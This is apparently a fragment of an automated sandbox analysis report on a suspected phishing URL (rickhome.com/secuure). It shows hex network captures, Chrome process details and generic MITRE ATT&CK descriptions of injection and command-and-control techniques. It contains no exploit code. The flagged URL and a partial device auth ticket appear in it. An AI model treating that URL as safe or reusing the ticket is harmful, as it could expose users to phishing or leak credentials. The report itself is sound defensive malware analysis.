74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-15 05:54:46 UTC	1064	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 32 64 45 50 48 68 70 4f 56 6b 36 2b 74 70 57 31 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 37 38 38 62 32 33 33 61 66 36 34 39 61 38 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 55 51 45 69 4f 64 53 64 36 74 58 75 4f 53 32 42 43 37 65 2f 33 48 39 6e 63 69 32 48 6e 5a 4b 72 72 67 46 62 30 61 72 4d 46 57 34 34 64 46 79 4c 2f 6a 45 7a 54 70 72 67 76 2f 63 69 42 32 59 43 58 36 47 4f 48 2b 31 7a 35 7a 4e 45 75 4f 4a 76 5a 6f 64 67 42 52 62 67 71 42 6d 6e 30 57 56 5a 57 67 64 49 30 4e 33 6a 41 50 53 69 Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 2dEPHhpOVk6+tpW1.2Context: 2788b233af649a89<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAATUQEiOdSd6tXuOS2BC7e/3H9nci2HnZKrrgFb0arMFW44dFyL/jEzTprgv/ciB2YCX6GOH+1z5zNEuOJvZodgBRbgqBmn0WVZWgdI0N3jAPSi
2024-07-15 05:54:46 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 32 64 45 50 48 68 70 4f 56 6b 36 2b 74 70 57 31 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 37 38 38 62 32 33 33 61 66 36 34 39 61 38 39 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: 2dEPHhpOVk6+tpW1.3Context: 2788b233af649a89<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-07-15 05:54:46 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-07-15 05:54:46 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 37 69 53 39 2b 64 38 78 4a 55 32 34 7a 31 53 70 43 65 51 62 69 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 7iS9+d8xJU24z1SpCeQbiA.0Payload parsing failed.

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 3704, Parent PID: 6072

General

Target ID:	0
Start time:	01:53:37
Start date:	15/07/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 5788, Parent PID: 3704

General

Target ID:	2
Start time:	01:53:42
Start date:	15/07/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=2288,i,1816104043459986088,14968201683527968697,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 3784, Parent PID: 6072

General

Target ID:	3
Start time:	01:53:44
Start date:	15/07/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://rickhome.com/secuure"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6272, Parent PID: 3704

General

Target ID:	4
Start time:	01:53:50
Start date:	15/07/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5852 --field-trial-handle=2288,i,1816104043459986088,14968201683527968697,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://rickhome.com/secuure

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 42

Chrome Cache Entry: 43

Static File Info

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 3704, Parent PID: 6072

General

Chronological Activities

Analysis Process: chrome.exePID: 5788, Parent PID: 3704

General

Chronological Activities

Analysis Process: chrome.exePID: 3784, Parent PID: 6072

General

Windows Analysis Report
https://rickhome.com/secuure